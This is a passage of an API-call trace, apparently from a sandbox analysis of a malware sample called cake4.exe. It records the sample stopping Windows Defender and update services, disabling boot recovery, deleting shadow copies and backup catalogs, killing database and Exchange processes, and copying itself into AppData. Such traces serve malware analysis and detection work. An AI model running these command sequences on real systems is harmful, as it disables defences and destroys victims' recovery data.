(hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="InitOnceExecuteOnce") returned 0x76d5d627 [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleEx") returned 0x76d5c78f [0053.189] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandle") returned 0x76d6cbfc [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeConditionVariable") returned 0x77c78456 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="WakeConditionVariable") returned 0x77ce7de4 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77c84892 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableSRW") returned 0x76dc4b74 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWork") returned 0x76d5ee45 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="SubmitThreadpoolWork") returned 0x77cb8491 [0053.190] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWork") returned 0x77cad8e2 [0053.191] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0053.191] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0053.191] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0053.191] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x75670000 [0053.191] GetProcAddress (hModule=0x75670000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0053.191] GetProcAddress (hModule=0x75670000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0053.191] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x800) returned 0x6e7818 [0053.192] QueryPerformanceFrequency (in: lpFrequency=0x4af7a0 | out: lpFrequency=0x4af7a0*=100000000) returned 1 [0053.192] QueryPerformanceCounter (in: lpPerformanceCount=0x4af798 | out: lpPerformanceCount=0x4af798*=17314702400) returned 1 [0053.192] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0053.192] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x22b957) returned 0x0 [0053.193] GetCurrentThread () returned 0xfffffffe [0053.193] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x4af78c, lpExitTime=0x4af794, lpKernelTime=0x4af794, lpUserTime=0x4af794 | out: lpCreationTime=0x4af78c, lpExitTime=0x4af794, lpKernelTime=0x4af794, lpUserTime=0x4af794) returned 1 [0053.193] RtlInitializeSListHead (in: ListHead=0x28d768 | out: ListHead=0x28d768) [0053.195] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6e48f0) returned 0x80 [0053.195] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6e48f0, Size=0x100) returned 0x6e8c68 [0053.197] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6e8c68) returned 0x100 [0053.197] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6e8c68, Size=0x200) returned 0x6e8c68 [0053.197] RtlInitializeConditionVariable () returned 0x28e09c [0053.199] GetStartupInfoW (in: lpStartupInfo=0x4af780 | out: lpStartupInfo=0x4af780*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0053.200] FindResourceW (hModule=0x0, lpName=0x66, lpType=0xa) returned 0x28f0b8 [0053.206] LoadResource (hModule=0x0, hResInfo=0x28f0b8) returned 0x28f0f0 [0053.206] LockResource (hResData=0x28f0f0) returned 0x28f0f0 [0053.206] SizeofResource (hModule=0x0, hResInfo=0x28f0b8) returned 0x237 [0053.206] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x237) returned 0x6e9368 [0053.207] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8218 [0053.207] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8240 [0053.207] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8218 | out: hHeap=0x6d0000) returned 1 [0053.207] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e95a8 [0053.210] GetEnvironmentVariableW (in: lpName="SYSTEMROOT", lpBuffer=0x6e95c0, nSize=0xffff | out: lpBuffer="C:\\Windows") returned 0xa [0053.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8fe0 [0053.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8218 [0053.210] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e95a8 | out: hHeap=0x6d0000) returned 1 [0053.210] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8240 | out: hHeap=0x6d0000) returned 1 [0053.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e95a8 [0053.210] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x6e95c0, nSize=0xffff | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0053.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e9000 [0053.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6e9038 [0053.210] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8fe0 | out: hHeap=0x6d0000) returned 1 [0053.210] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e95a8 | out: hHeap=0x6d0000) returned 1 [0053.210] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e95a8 [0053.210] GetEnvironmentVariableW (in: lpName="TMP", lpBuffer=0x6e95c0, nSize=0xffff | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x48) returned 0x7095d8 [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x709628 [0053.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9000 | out: hHeap=0x6d0000) returned 1 [0053.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e95a8 | out: hHeap=0x6d0000) returned 1 [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8240 [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8268 [0053.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8240 | out: hHeap=0x6d0000) returned 1 [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e95a8 [0053.211] GetEnvironmentVariableW (in: lpName="PROGRAMDATA", lpBuffer=0x6e95c0, nSize=0xffff | out: lpBuffer="C:\\ProgramData") returned 0xe [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x709680 [0053.211] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8240 [0053.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7095d8 | out: hHeap=0x6d0000) returned 1 [0053.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e95a8 | out: hHeap=0x6d0000) returned 1 [0053.211] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop wscsvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="sc stop wscsvc", lpProcessInformation=0x4af6c8*(hProcess=0x78, hThread=0x74, dwProcessId=0x434, dwThreadId=0x7a8)) returned 1 [0053.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e8fe0 [0053.241] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8268 | out: hHeap=0x6d0000) returned 1 [0053.241] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x4af6c8*(hProcess=0x7c, hThread=0x80, dwProcessId=0x564, dwThreadId=0x560)) returned 1 [0053.247] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop wuauserv", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="sc stop wuauserv", lpProcessInformation=0x4af6c8*(hProcess=0x84, hThread=0x88, dwProcessId=0x23c, dwThreadId=0x2a8)) returned 1 [0053.253] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop BITS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="sc stop BITS", lpProcessInformation=0x4af6c8*(hProcess=0x8c, hThread=0x90, dwProcessId=0x114, dwThreadId=0x79c)) returned 1 [0053.494] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop ERSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="sc stop ERSvc", lpProcessInformation=0x4af6c8*(hProcess=0x94, hThread=0x98, dwProcessId=0x790, dwThreadId=0x798)) returned 1 [0053.499] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop WerSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="sc stop WerSvc", lpProcessInformation=0x4af6c8*(hProcess=0x9c, hThread=0xa0, dwProcessId=0x7c4, dwThreadId=0x5ac)) returned 1 [0053.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x46) returned 0x7096e8 [0053.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8fe0 | out: hHeap=0x6d0000) returned 1 [0053.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x68) returned 0x709738 [0053.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7096e8 | out: hHeap=0x6d0000) returned 1 [0053.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x7097a8 [0053.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709738 | out: hHeap=0x6d0000) returned 1 [0053.504] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="cmd.exe /c bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x4af6c8*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x7d0, dwThreadId=0x54c)) returned 1 [0053.520] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x4af6c8*(hProcess=0xac, hThread=0xb0, dwProcessId=0x64, dwThreadId=0x490)) returned 1 [0053.530] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="cmd.exe /c vssadmin delete shadows /all /quiet", lpProcessInformation=0x4af6c8*(hProcess=0xb4, hThread=0xb8, dwProcessId=0x6c0, dwThreadId=0x664)) returned 1 [0054.151] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="cmd.exe /c wmic shadowcopy delete", lpProcessInformation=0x4af6c8*(hProcess=0xbc, hThread=0xc0, dwProcessId=0x7f4, dwThreadId=0x804)) returned 1 [0054.162] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="cmd.exe /c wbadmin delete catalog -quiet", lpProcessInformation=0x4af6c8*(hProcess=0xc4, hThread=0xc8, dwProcessId=0x814, dwThreadId=0x824)) returned 1 [0054.172] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im MSExchange*", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="taskkill /f /im MSExchange*", lpProcessInformation=0x4af6c8*(hProcess=0xcc, hThread=0xd0, dwProcessId=0x8d4, dwThreadId=0x8e4)) returned 1 [0054.422] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im Microsoft.Exchange.*", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="taskkill /f /im Microsoft.Exchange.*", lpProcessInformation=0x4af6c8*(hProcess=0xd4, hThread=0xd8, dwProcessId=0x8f4, dwThreadId=0x904)) returned 1 [0054.444] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im sqlserver.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="taskkill /f /im sqlserver.exe", lpProcessInformation=0x4af6c8*(hProcess=0xdc, hThread=0xe0, dwProcessId=0x914, dwThreadId=0x924)) returned 1 [0054.456] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im sqlwriter.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af684*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af6c8 | out: lpCommandLine="taskkill /f /im sqlwriter.exe", lpProcessInformation=0x4af6c8*(hProcess=0xe4, hThread=0xe8, dwProcessId=0x934, dwThreadId=0x944)) returned 1 [0054.968] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8268 [0054.968] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e8fe0 [0054.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8268 | out: hHeap=0x6d0000) returned 1 [0054.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7097a8 | out: hHeap=0x6d0000) returned 1 [0054.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8fe0 | out: hHeap=0x6d0000) returned 1 [0054.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9368 | out: hHeap=0x6d0000) returned 1 [0054.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x209933, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf0 [0054.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x6e9368 [0054.971] GetCurrentProcess () returned 0xffffffff [0054.971] GetModuleBaseNameA (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x6e9368, nSize=0x104 | out: lpBaseName="cake4.exe") returned 0x9 [0054.971] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0054.971] RtlWakeAllConditionVariable () returned 0x0 [0054.971] lstrcmpA (lpString1="cake4.exe", lpString2="mhtop32bit.exe") returned -1 [0054.983] lstrcatA (in: lpString1="", lpString2=" /c copy \"" | out: lpString1=" /c copy \"") returned=" /c copy \"" [0054.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x709810 [0054.983] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x709810, nSize=0x12c | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe")) returned 0x2f [0054.983] lstrcatA (in: lpString1=" /c copy \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" | out: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe") returned=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" [0054.983] lstrcatA (in: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", lpString2="\"" | out: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\"") returned=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\"" [0054.984] lstrcatA (in: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\"", lpString2=" \"%APPDATA%\\" | out: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\") returned=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\" [0054.984] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0054.984] lstrcatA (in: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\", lpString2="mhtop32bit.exe" | out: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe") returned=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe" [0054.984] lstrcatA (in: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe", lpString2="\"" | out: lpString1=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe\"") returned=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe\"" [0055.003] ShellExecuteA (hwnd=0x0, lpOperation="open", lpFile="cmd", lpParameters=" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe\"", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0063.672] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709810 | out: hHeap=0x6d0000) returned 1 [0063.672] RegCreateKeyW (in: hKey=0x80000002, 